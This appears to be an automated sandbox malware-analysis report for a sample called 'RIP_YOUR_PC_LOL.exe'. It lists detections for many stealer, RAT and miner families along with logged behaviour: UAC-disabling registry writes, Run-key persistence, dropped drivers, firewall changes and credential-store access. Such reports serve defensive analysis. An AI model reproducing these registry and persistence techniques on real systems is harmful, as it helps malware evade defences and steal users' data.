memory/2464-316-0x0000000000400000-0x000000000044F000-memory.dmp

memory/3048-320-0x0000000000400000-0x0000000000434000-memory.dmp

memory/1028-319-0x0000000000400000-0x0000000000491000-memory.dmp

memory/2852-318-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2852-323-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2852-322-0x0000000000400000-0x0000000000424000-memory.dmp

memory/1792-327-0x0000000000AE0000-0x0000000000B74000-memory.dmp

memory/2564-328-0x0000000005080000-0x000000000662A000-memory.dmp

memory/2096-329-0x0000000000400000-0x00000000019AA000-memory.dmp

memory/1528-354-0x0000000001AA0000-0x0000000002020000-memory.dmp

memory/2904-355-0x000000013F3C0000-0x000000013F940000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\259457134.bat

MD5 3880eeb1c736d853eb13b44898b718ab
SHA1 4eec9d50360cd815211e3c4e6bdd08271b6ec8e6
SHA256 936d9411d5226b7c5a150ecaf422987590a8870c8e095e1caa072273041a86e7
SHA512 3eaa3dddd7a11942e75acd44208fbe3d3ff8f4006951cd970fb9ab748c160739409803450d28037e577443504707fc310c634e9dc54d0c25e8cfe6094f017c6b

memory/2904-397-0x000000013F3C0000-0x000000013F940000-memory.dmp

memory/1528-396-0x0000000001AA0000-0x0000000002020000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-12-04 19:14

Reported

2024-12-04 19:18

Platform

win10v2004-20241007-en

Max time kernel

143s

Max time network

219s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe"

Signatures

AsyncRat

rat asyncrat

Asyncrat family

asyncrat

Azorult

trojan infostealer azorult

Azorult family

azorult

Blackmoon family

blackmoon

Blackmoon, KrBanker

trojan banker blackmoon

DcRat

rat infostealer dcrat

Dcrat family

dcrat

Detect Blackmoon payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect PurpleFox Rootkit

rootkit
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Fickerstealer

infostealer fickerstealer

Fickerstealer family

fickerstealer

Gh0st RAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Gh0strat

rat gh0strat

Gh0strat family

gh0strat

HawkEye

keylogger trojan stealer spyware hawkeye

Hawkeye family

hawkeye

NanoCore

keylogger trojan stealer spyware nanocore

Nanocore family

nanocore

Njrat family

njrat

Oski

infostealer oski

Oski family

oski

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

PurpleFox

rootkit trojan purplefox

Purplefox family

purplefox

Raccoon

stealer raccoon

Raccoon Stealer V1 payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Raccoon family

raccoon

RedLine

infostealer redline

Redline family

redline

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Windows\Resources\Ease of Access Themes\schtasks.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Roaming\3.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Roaming\3.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\AppData\Roaming\3.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\Resources\Ease of Access Themes\schtasks.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Windows\Resources\Ease of Access Themes\schtasks.exe N/A

Xmrig family

xmrig

njRAT/Bladabindi

trojan njrat

xmrig

miner xmrig

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detected Nirsoft tools

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\a.exe N/A

NirSoft MailPassView

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\system32\drivers\QAssist.sys C:\Windows\SysWOW64\TXPlatforn.exe N/A
File created C:\Windows\system32\drivers\hitmanpro37.sys C:\Users\Admin\Downloads\HitmanPro_x64.exe N/A
File opened for modification C:\Windows\system32\drivers\hitmanpro37.sys C:\Users\Admin\Downloads\HitmanPro_x64.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Server Software Component: Terminal Services DLL

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Ö÷¶¯·ÀÓù·þÎñÄ£¿é\Parameters\ServiceDll = "C:\\Windows\\system32\\240629765.txt" C:\Users\Admin\AppData\Local\Temp\svchos.exe N/A

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QAssist\ImagePath = "system32\\DRIVERS\\QAssist.sys" C:\Windows\SysWOW64\TXPlatforn.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\a.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\a.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\gay.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\3.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\healastounding.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\4.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a797c6ca3f5e7aff8fa1149c47fe9466.exe C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a797c6ca3f5e7aff8fa1149c47fe9466.exe C:\Users\Admin\AppData\Roaming\mediaget.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\healastounding.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Pluto Panel.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\22.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\___11.19.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\test.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\gay.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Opus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\4.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\a.exe N/A
N/A N/A C:\Windows\SysWOW64\TXPlatforn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchos.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe N/A
N/A N/A C:\Windows\SysWOW64\TXPlatforn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\HD____11.19.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Windows\SysWOW64\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe N/A
N/A N/A C:\Windows\Resources\Ease of Access Themes\schtasks.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe N/A
N/A N/A C:\Windows\Help\Winlogon.exe N/A
N/A N/A C:\Windows\Cursors\WUDFhosts.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\TXPlatforn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchos.exe N/A
N/A N/A C:\Windows\SysWOW64\TXPlatforn.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
N/A N/A C:\Users\Admin\Downloads\HitmanPro_x64.exe N/A

Impair Defenses: Safe Mode Boot

defense_evasion
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\hitmanpro37 C:\Users\Admin\Downloads\HitmanPro_x64.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\hitmanpro37.sys C:\Users\Admin\Downloads\HitmanPro_x64.exe N/A

Reads user/profile data of web browsers

spyware stealer

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 185.228.168.9 N/A N/A

Uses the VBS compiler for execution

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\WindowsUpdate.exe" C:\Users\Admin\AppData\Roaming\Pluto Panel.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SearchApp = "\"C:\\Program Files (x86)\\Internet Explorer\\fr-FR\\SearchApp.exe\"" C:\Users\Admin\AppData\Roaming\3.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\schtasks = "\"C:\\Windows\\Resources\\Ease of Access Themes\\schtasks.exe\"" C:\Users\Admin\AppData\Roaming\3.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Users\\Default User\\winlogon.exe\"" C:\Users\Admin\AppData\Roaming\3.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a797c6ca3f5e7aff8fa1149c47fe9466 = "\"C:\\Users\\Admin\\AppData\\Roaming\\mediaget.exe\" .." C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\a797c6ca3f5e7aff8fa1149c47fe9466 = "\"C:\\Users\\Admin\\AppData\\Roaming\\mediaget.exe\" .." C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\SCSI Monitor = "C:\\Program Files (x86)\\SCSI Monitor\\scsimon.exe" C:\Users\Admin\AppData\Roaming\Opus.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Windows\Resources\Ease of Access Themes\schtasks.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\Resources\Ease of Access Themes\schtasks.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Roaming\Opus.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Roaming\a.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Roaming\3.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Roaming\3.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\F: C:\Users\Admin\Downloads\HitmanPro_x64.exe N/A
File opened (read-only) \??\D: C:\Users\Admin\Downloads\HitmanPro_x64.exe N/A

Indicator Removal: File Deletion

defense_evasion

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A whatismyipaddress.com N/A N/A
N/A whatismyipaddress.com N/A N/A

Checks system information in the registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\TXPlatforn.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
File opened for modification C:\Windows\SysWOW64\TXPlatforn.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
File created C:\Windows\SysWOW64\240629765.txt C:\Users\Admin\AppData\Local\Temp\svchos.exe N/A
File opened for modification C:\Windows\SysWOW64\ini.ini C:\Users\Admin\AppData\Local\Temp\svchos.exe N/A
File created C:\Windows\SysWOW64\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe C:\Windows\SysWOW64\svchost.exe N/A
File opened for modification C:\Windows\SysWOW64\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe C:\Windows\SysWOW64\svchost.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\VideoLAN\VLC\vlc.exe C:\Users\Admin\AppData\Roaming\___11.19.exe N/A
File created C:\Program Files (x86)\Internet Explorer\fr-FR\SearchApp.exe C:\Users\Admin\AppData\Roaming\3.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files (x86)\SCSI Monitor\scsimon.exe C:\Users\Admin\AppData\Roaming\Opus.exe N/A
File opened for modification C:\Program Files (x86)\SCSI Monitor\scsimon.exe C:\Users\Admin\AppData\Roaming\Opus.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Users\Admin\AppData\Roaming\___11.19.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Users\Admin\AppData\Roaming\___11.19.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\firefox.exe C:\Users\Admin\AppData\Roaming\___11.19.exe N/A
File created C:\Program Files (x86)\Google\Chrome\Application\chrome.exe C:\Users\Admin\AppData\Roaming\___11.19.exe N/A
File opened for modification C:\Program Files (x86)\Internet Explorer\fr-FR\SearchApp.exe C:\Users\Admin\AppData\Roaming\3.exe N/A
File created C:\Program Files (x86)\Internet Explorer\fr-FR\38384e6a620884a6b69bcc56f80d556f9200171c C:\Users\Admin\AppData\Roaming\3.exe N/A
File created C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Help\Winlogon.exe C:\Users\Admin\AppData\Roaming\22.exe N/A
File created C:\Windows\Help\active_desktop_render.dll C:\Users\Admin\AppData\Roaming\22.exe N/A
File created C:\Windows\Cursors\WUDFhosts.exe C:\Users\Admin\AppData\Roaming\22.exe N/A
File created C:\Windows\Resources\Ease of Access Themes\schtasks.exe C:\Users\Admin\AppData\Roaming\3.exe N/A
File created C:\Windows\Resources\Ease of Access Themes\3a6fe29a7ceee6587669798812d4baccab0fb913 C:\Users\Admin\AppData\Roaming\3.exe N/A
File created C:\Windows\Cursors\KillProcc.sys C:\Users\Admin\AppData\Roaming\22.exe N/A
File opened for modification C:\Windows\Cursors\TrustedInsteller.exe C:\Users\Admin\AppData\Roaming\22.exe N/A
File created C:\Windows\Help\active_desktop_render_New.dll C:\Windows\SysWOW64\svchost.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
